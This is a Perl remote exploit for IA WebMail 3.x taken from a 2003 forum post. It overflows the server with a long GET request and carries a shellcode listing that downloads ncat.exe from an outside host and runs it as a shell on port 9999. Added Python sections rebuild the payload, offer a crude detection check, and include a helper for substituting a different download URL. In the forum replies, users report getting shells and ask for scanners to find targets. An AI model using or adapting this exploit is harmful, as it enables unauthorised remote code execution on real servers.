#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
#
# By Peter Winter-Smith [peter4020@hotmail.com]
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
#   - Windows XP Home SP1
#   - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals its addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
#
# Notes:
#   - WebMailsvr.exe exits without consuming 100% resources in most
#     cases.
#   - This has only been tested with IA WebMail 3.1, however it was
#     designed to exploit all versions.

use IO::Socket;

die "Usage: $0 <host> <port>\n" unless @ARGV == 2;

# $shellcode holds the assembled bytes of the listing at the bottom of
# this file. The hex string itself is missing from this copy of the post,
# so it has to be supplied (nasmw -fbin the listing, then pack the output
# as a Perl byte string) before the script does anything useful.
our $shellcode;
die "Set \$shellcode to the assembled shellcode before running.\n"
    unless defined $shellcode && length $shellcode;

$victim = IO::Socket::INET->new(Proto    => 'tcp',
                                PeerAddr => $ARGV[0],
                                PeerPort => $ARGV[1])
    or die "Unable to connect to $ARGV[0] on port $ARGV[1]\n";

$ebp = "BBBB";                  # lands on the saved frame pointer
$eip = "\x33\xBD\x02\x10";      # 0x1002BD33: jmp esp inside iaregdll.dll

# 1036 bytes of filler reach the saved EBP; the return address follows it,
# and the shellcode sits where ESP points once the jmp esp is taken.
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";

print $victim $exploit;

print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";
print "Done.\n";

close($victim);
exit;
#####################################################################
## SHELLCODE                                                        #
#####################################################################
#; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
#; Url Download + Execute
#; By Peter Winter-Smith
#; [peter4020@hotmail.com]
#;
#; nasmw -fbin -o iashellcode.s iashellcode.asm
#
# bits 32
#
#     int3
#     jmp short killnull
#
# next:
#     pop edi
#
#     push ebp
#     mov ebp, esp
#     add esp, -24
#
#     push edi
#
#     xor ebx, ebx
#     mov bl, 07h
#     mov al, 0ffh
#
#     cld
# nullify:
#     repne scasb
#     inc byte [edi-01h]
#     dec bl
#     cmp bl, 01h
#     jne nullify
#
#     pop edi
#
#     push edi            ; 'URLMON.DLL'
#     lea edi, [edi+11]
#     push edi            ; 'URLDownloadToFileA'
#     lea edi, [edi+19]
#     push edi            ; 'WinExec'
#     lea edi, [edi+08]
#     push edi            ; 'http://www.elitehaven.net/ncat.exe'
#     lea edi, [edi+35]
#     push edi            ; 'c:\nc.exe'
#     lea edi, [edi+09]
#     inc edi
#     push edi            ; 'kernel32.dll'
#
#     lea edx, [esp+20]
#     push edx
#
#     jmp short over
# killnull:
#     jmp short data
# over:
#
#     mov esi, edx
#     push dword [esi]
#
#     call [100251DCh]    ; LoadLibraryA
#
#     pop edx
#     push edx
#     lea esi, [edx-04]
#     push dword [esi]
#
#     push eax
#
#     call [10025214h]    ; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
#
#     pop edx
#     push edx
#
#     xor ecx, ecx
#     push ecx
#     push ecx
#     lea esi, [edx-16]   ; file path
#     push dword [esi]
#     lea esi, [edx-12]   ; url
#     push dword [esi]
#     push ecx
#
#     call eax
#
#     pop edx
#     push edx
#
#     push dword [edx-20]
#
#     call [100251DCh]    ; LoadLibraryA
#
#     pop edx
#     push edx
#
#     lea esi, [edx-08]
#     push dword [esi]    ; 'WinExec'
#     push eax            ; kernel32.dll handle
#
#     call [10025214h]    ; GetProcAddress(kernel32.dll, WinExec);
#
#     pop edx
#     push edx
#
#     xor ecx, ecx
#     inc ecx
#     push ecx
#
#     lea esi, [edx-16]   ; file path
#     push dword [esi]
#
#     call eax
#
#     int3
#
# data:
#     call next
#     db 'URLMON.DLL',0ffh
#     db 'URLDownloadToFileA',0ffh
#     db 'WinExec',0ffh
#     db 'http://www.elitehaven.net/ncat.exe',0ffh
#; When altering, you MUST be sure
#; to also alter the offsets in the 0ffh to null
#; byte search!
#; for example:
#;     db 'http://www.site.com/someguy/trojan.exe',0ffh
#; count the length of the url, and add one for the 0ffh byte.
#; The above url is 38 bytes long, plus one for our null, is 39 bytes.
#; find the code saying (at the start of the shellcode):
#;     push edi            ; 'http://www.elitehaven.net/ncat.exe'
#;     lea edi, [edi+35]
#; and make it:
#;     push edi            ; 'http://www.site.com/someguy/trojan.exe'
#;     lea edi, [edi+39]
#; same goes for the filename below :o)
#     db 'c:\nc.exe',0ffh
#     db 'kernel32.dll',0ffh
#####################################################################
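The request layout used by the Perl above, rebuilt as an added example (this is not code from the original post or its author): it assembles the GET request from the same pieces (1036 bytes of filler, four bytes over the saved EBP, the 0x1002BD33 return address, then the shellcode), parses a captured request back into those parts, and applies the kind of crude length and character-set check a network rule would use to spot it. The shellcode is a constructed int3 stand-in, the benign request is a constructed placeholder, and the 1024-byte threshold is an assumption picked to sit below the overflow offset.

```python
import re

# Values taken from the exploit above.
OFFSET_TO_SAVED_EBP = 1036
SAVED_EBP = b"BBBB"
RET_ADDR = 0x1002BD33                       # jmp esp inside iaregdll.dll
RET_BYTES = RET_ADDR.to_bytes(4, "little")  # == b"\x33\xBD\x02\x10"

# Constructed stand-in for the real shellcode: an int3 sled, not the author's bytes.
FAKE_SHELLCODE = b"\xcc" * 96


def build_request(shellcode, offset=OFFSET_TO_SAVED_EBP, ret=RET_BYTES):
    """Same byte layout as the Perl: filler, saved EBP, return address, shellcode."""
    return b"GET /" + b"a" * offset + SAVED_EBP + ret + shellcode + b" HTTP/1.1\n\n"


def request_target(raw):
    """Request-target of the first line, i.e. what sits between the method and
    the HTTP version. Assumes the payload carries no newline byte."""
    first_line = raw.split(b"\n", 1)[0]
    _method, _, rest = first_line.partition(b" ")
    target, _, _version = rest.rpartition(b" ")
    return target


def parse_payload(target, offset=OFFSET_TO_SAVED_EBP):
    """Recover the overflow pieces from a captured request-target."""
    body = target[1:]                       # drop the leading '/'
    return {
        "filler": body[:offset],
        "saved_ebp": body[offset:offset + 4],
        "ret": int.from_bytes(body[offset + 4:offset + 8], "little"),
        "shellcode": body[offset + 8:],
    }


# Unreserved and reserved URI characters plus '%'; anything else (raw
# address bytes, shellcode) is out of place in a request-target.
URI_SAFE = re.compile(rb"^[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]*$")


def is_suspicious(raw, max_target_len=1024):
    """True when the request-target is implausibly long for this server or
    carries bytes outside the URI character set. max_target_len is an
    assumed threshold; tune it to the URLs the real application emits."""
    target = request_target(raw)
    return len(target) > max_target_len or URI_SAFE.match(target) is None


if __name__ == "__main__":
    attack = build_request(FAKE_SHELLCODE)
    parts = parse_payload(request_target(attack))
    print("ret = 0x%08X, shellcode bytes = %d" % (parts["ret"], len(parts["shellcode"])))
    print("attack flagged:", is_suspicious(attack))
    print("benign flagged:", is_suspicious(b"GET /index.html HTTP/1.1\n\n"))
```

The length check alone is enough for this particular exploit, but the character-set check is what still fires if someone shortens the filler or moves the return address; a production rule would additionally key on the destination port and the WebMail service rather than on every HTTP request.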
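The bookkeeping the shellcode comments describe (count each string, add one for the 0ffh terminator, fix up the matching `lea edi,[edi+N]`) is easy to get wrong by hand, so here is an added example that does it mechanically; it is not code from the original post or its author. It builds the `db` table with 0xff terminators, computes the `lea` immediates and string offsets, simulates the `repne scasb` / `inc byte [edi-1]` loop that turns each 0xff into 0x00 at run time, and checks the table for bytes that would not survive an HTTP request line. The string list is the one from the listing above; the set of forbidden bytes (0x00, 0x0a, 0x0d) is an assumption based on the payload travelling inside a GET line, and the split of a 10-byte step into `lea edi,[edi+09]` plus `inc edi` mirrors the listing, which I read as avoiding a 0x0a immediate in the encoded instruction.

```python
# Strings exactly as they appear in the listing's data section.
STRINGS = [
    "URLMON.DLL",
    "URLDownloadToFileA",
    "WinExec",
    "http://www.elitehaven.net/ncat.exe",
    "c:\\nc.exe",
    "kernel32.dll",
]
SENTINEL = 0xFF
# Assumed bad bytes for a payload carried in an HTTP request line: NUL ends
# the C string, CR/LF end the line. A space may also matter, parser-dependent.
BAD_BYTES = {0x00, 0x0A, 0x0D}


def build_data_blob(strings):
    """Emit the `db '...',0ffh` table: each string followed by one 0xff byte."""
    blob = bytearray()
    for s in strings:
        raw = s.encode("ascii")
        if b"\x00" in raw or bytes([SENTINEL]) in raw:
            raise ValueError(f"string may not contain 0x00 or 0xff: {s!r}")
        blob += raw + bytes([SENTINEL])
    return bytes(blob)


def lea_offsets(strings):
    """Immediates for the `lea edi,[edi+N]` chain: length plus one for the
    terminator. Any change to a string must be mirrored here."""
    return [len(s) + 1 for s in strings]


def string_starts(strings):
    """Offset of each string from the start of the table."""
    starts, pos = [], 0
    for n in lea_offsets(strings):
        starts.append(pos)
        pos += n
    return starts


def nullify(blob, passes):
    """Simulate the shellcode loop: `repne scasb` with al=0ffh stops one past
    the next 0xff, `inc byte [edi-1]` wraps that byte to 0x00. With
    `mov bl,07h` and the `cmp bl,01h` exit test it runs six passes."""
    buf = bytearray(blob)
    edi = 0
    for _ in range(passes):
        while buf[edi] != SENTINEL:
            edi += 1
        edi += 1                               # scasb leaves edi past the hit
        buf[edi - 1] = (buf[edi - 1] + 1) & 0xFF
    return bytes(buf)


def split_cstrings(blob):
    """Read the table back as NUL-terminated strings, as the API calls will."""
    return [p.decode("ascii") for p in blob.split(b"\x00") if p]


def find_bad_bytes(blob):
    """Positions of bytes that must not be present in the request as sent."""
    return [i for i, b in enumerate(blob) if b in BAD_BYTES]


def asm_listing(strings):
    """Render the push/lea chain and the db table for a new string set. A
    step whose immediate is itself a bad byte is split into lea + inc."""
    lines = []
    offsets = lea_offsets(strings)
    for i, s in enumerate(strings):
        lines.append(f"    push edi            ; '{s}'")
        if i < len(strings) - 1:
            n = offsets[i]
            if n in BAD_BYTES:
                lines.append(f"    lea edi, [edi+{n - 1}]")
                lines.append("    inc edi")
            else:
                lines.append(f"    lea edi, [edi+{n}]")
    lines.append("data:")
    lines.extend(f"    db '{s}',0ffh" for s in strings)
    return "\n".join(lines)


if __name__ == "__main__":
    table = build_data_blob(STRINGS)
    print("lea offsets:", lea_offsets(STRINGS))
    print("bad bytes before nullify:", find_bad_bytes(table))
    print("bad bytes after nullify: ", find_bad_bytes(nullify(table, len(STRINGS))))
    print(asm_listing(STRINGS))
```

Swapping in a different download URL or drop path is then a matter of editing `STRINGS` and pasting the regenerated chain and table over the corresponding lines of the listing; the bad-byte check on the fresh table tells you before assembling whether the new strings would have broken the request.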
flame
Nov 19 2003, 05:40 PM
QUOTE
[ Proof of Concept Exploit for IA WebMail 3.x ]
Tested against: -WinXP Home SP1 (should work for all XP systems) -Win2K Pro SP4
Downloads and executes the file 'http://www.elitehaven.net/ncat.exe' which is set to spawn a shell on port 9999 on the target system.
The exploit will only work if the following conditions are true: -The remote system has internet access which will allow: - A file to be downloaded from a server on port 80. - A new process to be started and listen on port 9999.
This exploit will probably fail if the target is running a firewall, so if you wish to re-write the code for these exceptions please feel free. You may wish to change the file to be downloaded too - I have made it obvious where you can do this in the exploit code.
Have fun! )
-Peter
Toilal
Nov 19 2003, 06:10 PM
Posted: Nov 19 2003, 12:30 PM
Same title, same post, 3 hours later only. Great!!
T3cHn0b0y
Nov 19 2003, 08:26 PM
QUOTE (flame @ Nov 19 2003, 05:40 PM)
QUOTE
[ Proof of Concept Exploit for IA WebMail 3.x ]
Tested against: -WinXP Home SP1 (should work for all XP systems) -Win2K Pro SP4
Downloads and executes the file 'http://www.elitehaven.net/ncat.exe' which is set to spawn a shell on port 9999 on the target system.
The exploit will only work if the following conditions are true: -The remote system has internet access which will allow: - A file to be downloaded from a server on port 80. - A new process to be started and listen on port 9999.
This exploit will probably fail if the target is running a firewall, so if you wish to re-write the code for these exceptions please feel free. You may wish to change the file to be downloaded too - I have made it obvious where you can do this in the exploit code.
Have fun! )
-Peter
Where does it say 'nc.exe -lvvp 9999 -e CMD.EXE'?
I only see 'c:\nc.exe'
antique
Nov 19 2003, 09:30 PM
I need a scanner for this variable, anyone have it?
WeeDMoNKeY
Nov 20 2003, 12:12 AM
T3cHn0b0y, uhm, you connect to it because it downloads netcat. Read, re-read and read once more, you'll get it... and Toilal, flame added a little more.... ty flame
Anyone know the CGI line to scan for? thx.
ssj4conejo
Nov 20 2003, 07:02 AM
thx a lot for the code and the file. Does this run on a certain port? Thank you.
T3cHn0b0y
Nov 20 2003, 07:27 PM
Ok, I didn't know the execution was done inside the hex. I thought it was trying to execute nc.exe on its own.
ivan288
Nov 20 2003, 07:59 PM
Nice exploit, how do you scan for it though?
Remulus
Dec 16 2003, 09:05 AM
Nice exploit. It works, I got a shell twice. Is there a good scanner for this?
Sorry for my English.